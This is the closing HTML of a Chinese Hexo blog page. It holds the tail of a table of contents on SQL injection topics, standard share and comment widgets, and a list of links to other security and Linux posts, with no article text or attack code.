class="toc-link" href="#常见处理X-Forwarded-For方法"><span class="toc-number">14.</span> <span class="toc-text">常见处理X-Forwarded-For方法</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#二阶注入"><span class="toc-number">15.</span> <span class="toc-text">二阶注入</span></a></li></ol>
</div>
<input type="button" id="tocButton" value="隐藏目录" title="点击按钮隐藏或者显示文章目录">

<script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script>
    var valueHide = "隐藏目录";
    var valueShow = "显示目录";

    if ($(".left-col").is(":hidden")) {
        $("#tocButton").attr("value", valueShow);
    }
    $("#tocButton").click(function() {
        if ($("#toc").is(":hidden")) {
            $("#tocButton").attr("value", valueHide);
            $("#toc").slideDown(320);
        }
        else {
            $("#tocButton").attr("value", valueShow);
            $("#toc").slideUp(350);
        }
    })
    if ($(".toc").length < 1) {
        $("#toc, #tocButton").hide();
    }
</script>





<div class="bdsharebuttonbox">
	<a href="#" class="fx fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
	<a href="#" class="fx fa-weixin bds_weixin" data-cmd="weixin" title="分享到微信"></a>
	<a href="#" class="fx fa-qq bds_sqq" data-cmd="sqq" title="分享到QQ好友"></a>
	<a href="#" class="fx fa-facebook-official bds_fbook" data-cmd="fbook" title="分享到Facebook"></a>
	<a href="#" class="fx fa-twitter bds_twi" data-cmd="twi" title="分享到Twitter"></a>
	<a href="#" class="fx fa-linkedin bds_linkedin" data-cmd="linkedin" title="分享到linkedin"></a>
	<a href="#" class="fx fa-files-o bds_copy" data-cmd="copy" title="分享到复制网址"></a>
</div>
<script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"2","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];</script>




    
        <div id="gitments"></div>
<script src="/js/gitment.browser.js"></script>
<script>
    var gitment = new Gitment({
      id: window.location.pathname,
      owner: 'luuman',
      repo: 'luuman.github.io',
      oauth: {
        client_id: '',
        client_secret: '',
      },
    })
    gitment.render('gitments')
</script>
    



    <div class="scroll" id="post-nav-button">
        
            <a href="/2019/04/13/python2与python3在Windows中共存/" title="上一篇: python2与python3在Windows中共存">
                <i class="fa fa-angle-left"></i>
            </a>
        
        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>
        
            <a href="/2019/04/10/CMD常用命令/" title="下一篇: CMD常用命令">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>
    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/04/27/解析漏洞/">解析漏洞</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/27/图片马制作/">图片马制作的几种方式</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/13/python2与python3在Windows中共存/">python2与python3在Windows中共存</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/12/SQL注入/">SQL注入</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/10/CMD常用命令/">CMD常用命令</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/10/4/">apt-get remove与apt-get purge</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/30/3/">MySQL中的substr函数与PHP中的substr函数</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/07/作业四/">在ubuntu上搭建wordpress</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/04/作业三/">Httpd编译安装</a></li></ul>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
    <script>
        $(".post-list").addClass("toc-article");
        $(".post-list-item a").attr("target","_blank");
        $("#post-nav-button > a:nth-child(2)").click(function() {
            $(".fa-bars, .fa-times").toggle();
            $(".post-list").toggle(300);
            if ($(".toc").length > 0) {
                $("#toc, #tocButton").toggle(200, function() {
                    if ($(".switch-area").is(":visible")) {
                        $("#tocButton").attr("value", valueHide);
                        }
                    })
            }
            else {
            }
        })
    </script>



    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                &copy; 2019 iatk
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/luuman/hexo-theme-spfk" target="_blank">spfk</a> by luuman
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style="display:none">
                        <span id="site-visit">海贼到访数: 
                            <span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>, </span>
                
                
                    <span id="busuanzi_container_page_pv" style="display:none">
                        <span id="page-visit">本页阅读量: 
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>

    </div>
    <script src="https://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js"></script>
<script src="/js/main.js"></script>

    <script>
        $(document).ready(function() {
            var backgroundnum = 24;
            var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
            $("#mobile-nav").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
            $(".left-col").css({"background-image": backgroundimg,"background-size": "cover","background-position": "center"});
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments"><i class="fa fa-comments-o"></i></a>
    <a href="#footer"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    $(document).ready(function() {
        if ($("#comments").length < 1) {
            $("#scroll > a:nth-child(2)").hide();
        };
    })
</script>

<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js">
</script>

  <script language="javascript">
    $(function() {
        $("a[title]").each(function() {
            var a = $(this);
            var title = a.attr('title');
            if (title == undefined || title == "") return;
            a.data('title', title).removeAttr('title').hover(

            function() {
                var offset = a.offset();
                $("<div id=\"anchortitlecontainer\"></div>").appendTo($("body")).html(title).css({
                    top: offset.top - a.outerHeight() - 15,
                    left: offset.left + a.outerWidth()/2 + 1
                }).fadeIn(function() {
                    var pop = $(this);
                    setTimeout(function() {
                        pop.remove();
                    }, pop.text().length * 800);
                });
            }, function() {
                $("#anchortitlecontainer").remove();
            });
        });
    });
</script>


  </div>
</body>
</html>